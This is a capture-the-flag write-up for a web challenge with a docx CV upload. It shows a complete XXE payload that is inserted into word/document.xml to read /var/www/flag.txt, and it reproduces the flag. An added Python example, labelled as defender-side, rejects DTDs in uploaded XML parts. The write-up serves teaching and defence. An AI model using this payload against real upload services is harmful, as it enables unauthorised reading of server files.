Indead v2
Category: web
50 points
Job posting website for security experts, pentesters and hackers. Now you can apply by uploading CV. http://indead-upload-cv.ctf2021.hackpack.club
Hint 1: flag.txt is located in /var/www/
Hint 2: We have new job postings. You might be interested
Solution
It’s a continuation of Indead v1.
This time there’s a possibility to check the details page and upload a CV. The form allows only uploads of docx type files, and the content of the document is then shown on the page.
I decided to exploit it with XXE. I created a dummy docx file and, since it is an ordinary zip archive, extracted it and edited /word/document.xml by adding the payload below:
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///var/www/flag.txt" >]>
and &xxe; in the body of the XML.
The malicious document.xml looks like this after the change:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///var/www/flag.txt" >]>
<w:document xmlns:o="urn:schemas-microsoft-com:office:office"
 xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"
 xmlns:v="urn:schemas-microsoft-com:vml"
 xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"
 xmlns:w10="urn:schemas-microsoft-com:office:word"
 xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing"
 xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape"
 xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup"
 xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"
 xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing"
 xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml"
 mc:Ignorable="w14 wp14">
<w:body>
<w:p><w:pPr><w:pStyle w:val="Normal"/><w:bidi w:val="0"/><w:jc w:val="left"/><w:rPr></w:rPr></w:pPr><w:r><w:rPr></w:rPr><w:t>Badum, tssss…. &xxe;</w:t></w:r></w:p>
<w:sectPr><w:type w:val="nextPage"/><w:pgSz w:w="12240" w:h="15840"/><w:pgMar w:left="1134" w:right="1134" w:header="0" w:top="1134" w:footer="0" w:bottom="1134" w:gutter="0"/><w:pgNumType w:fmt="decimal"/><w:formProt w:val="false"/><w:textDirection w:val="lrTb"/></w:sectPr>
</w:body>
</w:document>
I swapped the original document.xml with mine and attempted to upload the prepared docx CV.
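As an added defender-side example (not code from this writeup or from the challenge), here is a stdlib-only Python check for the server that refuses any uploaded docx whose XML parts declare a DOCTYPE or an entity before the CV text is extracted. The minimal document.xml, the CV text and the docx itself are constructed in the block; the flag path is the one from the hint and is only written into a test document, never read.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from xml.parsers import expat

# Path from the challenge hint; only ever written into a test document, never read.
FLAG_PATH = "file:///var/www/flag.txt"
W_NS = "{http://schemas.openxmlformats.org/wordprocessingml/2006/main}"
# Constructed minimal document.xml; a real one carries many more namespaces.
DOCUMENT_XML = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>{dtd}'
    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
    '<w:body><w:p><w:r><w:t>{text}</w:t></w:r></w:p></w:body></w:document>'
)
MALICIOUS_DTD = ('<!DOCTYPE foo [ <!ELEMENT foo ANY >'
                 f'<!ENTITY xxe SYSTEM "{FLAG_PATH}" >]>')


def build_docx(dtd: str, text: str) -> bytes:
    """Build a constructed .docx: a zip holding a single word/document.xml part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("word/document.xml", DOCUMENT_XML.format(dtd=dtd, text=text))
    return buf.getvalue()


def part_declares_dtd(xml_bytes: bytes) -> bool:
    """True if an XML part carries a DOCTYPE or any entity declaration.
    expat's declaration callbacks are used instead of a substring match, and no
    ExternalEntityRefHandler is installed, so nothing is resolved or fetched."""
    seen = []
    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = lambda *_: seen.append("doctype")
    parser.EntityDeclHandler = lambda *_: seen.append("entity")
    try:
        parser.Parse(xml_bytes, True)
    except expat.ExpatError:
        pass  # malformed parts fail later in ET.fromstring; declarations seen still count
    return bool(seen)


def extract_cv_text(docx_bytes: bytes) -> str:
    """Server-side handling: refuse any part with a DTD, then read the <w:t> runs."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if name.endswith(".xml") and part_declares_dtd(zf.read(name)):
                raise ValueError(f"DTD or entity declaration in {name}: upload rejected")
        root = ET.fromstring(zf.read("word/document.xml"))
    return "".join(t.text or "" for t in root.iter(W_NS + "t"))
```

The same rejection applies to every XML part in the archive, since the entity could be declared in a part other than word/document.xml.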
Flag
flag{XML_is_ancestor_0f_every7hing_do_you_agree_?}